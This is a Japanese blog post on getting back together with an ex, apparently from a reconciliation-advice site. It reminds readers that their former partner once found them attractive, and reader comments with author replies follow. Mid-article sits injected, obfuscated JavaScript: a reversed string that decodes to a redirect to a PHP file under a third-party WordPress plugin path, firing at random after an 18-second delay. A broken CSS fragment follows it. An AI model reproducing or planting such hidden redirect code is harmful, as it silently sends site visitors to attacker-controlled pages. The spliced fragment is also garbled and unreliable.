【復縁相談】復縁を諦めるか迷っている人へ思い出して欲しいこと

この記事は4分で読めます

こんにちは、復縁ドッグです。

最近、時間を見つけては、サポートしている方と

スカイプでお話させてもらっているのですが、ここで、改めて、

復縁を目指すあなたに、思い出して欲しいことがありましたので、

そのある事実について、書いていきたいと思います。

 

私はこれまで、復縁も恋愛だと話してきました。

 

それは、紛れもない事実だと思っています。

復縁と恋愛、はじめて付き合うか、一度、付き合った人と付き合うかの差ですよね。

復縁も恋愛も、基本的には、付き合うまでの流れは同じです。

 

「この人、素敵だな。」

って、相手に思ってもらえれば、付き合う訳です。

 

 

スカイプで話していて思うのですが、

復縁を目指している方は、本ーーー当に、

自信を無くしてしまっているんです。

 

自信を無くしてしまっている理由は様々ですよ。

 

 

一度ならず、二度三度と、復縁を拒否されてしまっていますよね。

自分を受け入れてもらっていませんよね。

 

だから、自分が元カレ、元カノに愛されるというイメージが

付かなくなってしまっている気持ちも分かります。

でも、思い出してみて下さい。

 

あなたは、元彼、元カノと付き合っていたんですよ!

 

 

でも、どちらにしても、あなたと、元彼、元カノは

一度、付き合っているんです。

 

 

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom: 10px; border: 1px solid #460e44; background-color: #ffffef;”>

はじめて出会った人に、これからアプローチしていくのと、

一度付き合ったことがある人に、アプローチしていくの。

何が違うのでしょうか?

 

 

もう、答えは書いていますよ。

答えは簡単です。

 

それは、一度付き合っているかどうかの違いです。

 

 

 

復縁活動中の人は一度、元カノ、元彼の

ストライクゾーンに入ったことがあるんです。

 

分かりますか?

はじめて出会った人にアプローチする人は、

まだ、一度も、相手のストライクゾーンに入ったことがないんです。

 

 

(まあ、厳密に言えば、出会った瞬間に、ストライクゾーンに入っている

可能性はありますが…。)

 

 

でも、一度、付き合っているということは、

少なからず、相手のストライクゾーンには、入ったことがある。

だから、元カレ元カノは、あなたと付き合ったんです。

 

誰だって、自分の好み=ストライクゾーンから、逸脱した人と、

付き合いたいとは思いませんよね。

 

あなたは、既に、

1には、なったことがある人なんです。

 

ただ、それが2、3、100、1000と発展しなかっただけなんです。

 

種火を作ることはできたんです。

まきを燃やすことはできたんです。

でも、いつの間にか、火が消えかかっていた。

 

それに、気が付けなかった。

そして、消えてしまった。

それが、別れなんです。

ただ、それだけなんです。

 

 

分かりますか?

私が、ここで言いたことは、、、

 

元々、元カレ、元カノは、

あなたのことがタイプだったんです。

 

それが、どのタイミングかは分かりませんが、ズレてしまった。

もしくは、付き合った後で、ちょっと、違うぞ?

って思われてしまったか…。

 

どちらにせよ、繰り返しになりますが、元カレ、元カノは、

あなたのことを素敵だなって、思って付き合ったんです。

別れ方はどうあれ、付き合い方はどうあれ、その他モロモロは

どうあれ、一度は、好きになったんです。

 

 

これって、凄いことじゃないですか!

だから、そのことだけは、少なくとも自信を持ってください。

 

 

これ、当たり前のことですが、ほんとーーに、

忘れてしまっていることなんです。

 

みんな自分を、卑下しすぎなんです。

過去の過ちを後悔し、自分を全否定しすぎなんです。

もちろん、やるべきことはやらなくてはいけませんよ。

ズレを修正する作業は必要ですよ。

 

ですが、自分を全否定する必要はありませんし、

何度も言いますが、あなたは元彼、元カノのストライクゾーンに

入ったことがある人なんです。

 

 

「何言ってんの!」

「当たり前のこと言ってるだけじゃん!」

 

そう思われてしまうと思ったので、記事にするか迷いましたが、

そんな当たり前にことすら、忘れてしまうのが、失恋なのかもしれません。

そのことを思い出して欲しいと思い、当たり前のことを、

当たり前のように書いてみました。

 

復縁ドッグ

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

復縁ドッグによる全10回の復縁メール講座
復縁失敗体験から学ぶ復縁講座
復縁ドッグスカイプセミナー
復縁ドッグによる復縁基礎講座
復縁マニュアルレビュー

  • このエントリーをはてなブックマークに追加

関連記事

コメント

    • みおりーの

    先日彼に別れを告げられました。
    遠距離で半年ちょっと続いていたのですが
    なかなか会うことができず、冷めてしまったと言われました。

    まだ2日しか経ってないんですけど( •́ωก̀ )

    冷却期間とかどれくらいがベストなのでしょうか?

      • 復縁ドッグ

      冷却期間は自分を成長させる期間です。
      目安などを聞かれることもあるのですが、自分を変えられたかどうか?
      そっちの方がはるかに大事だと思います。
      もし冷却期間の目安をちゃんと決めるのであれば、話をよく聞いて
      進度などを聞きながらでないと、誠実な回答はできないと思います。

      期間ではなく、どれだけ成長できたか?
      ここを気にした方がいいと思いますよ(^^)/

    • 風沢ソラ

    先月下旬に彼から冷めたと言うことで振られてしまいました。
    別れ際に謝罪と感謝の手紙を渡し別れた翌日に想いがすごい伝わった1か月後でいいから会いたい連絡来てから毎日連絡を取ってます。
    会いたい理由は特に無くて、特別な意味は無いよと言われてしまいました。

    暫くして返事返す時間を変えたりしたら、気にして来たのか
    最近どう?いい事あったの?とか聞いてきます。
    前の会社の人なので社内の人に気持ちが行ったら不安なんですが…
    別れ際に彼の口からLINEからは社内恋愛は2度とやらない!こりごり!とか好きな人居ないし彼女居ないとか言ってたので復縁の可能性があるんでしょうか?
    冷却期間置いてないので少しずつLINEを送るべきなのか迷います。別れた後に私があげた手紙は全部とっといてあるみたいなんですが…

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座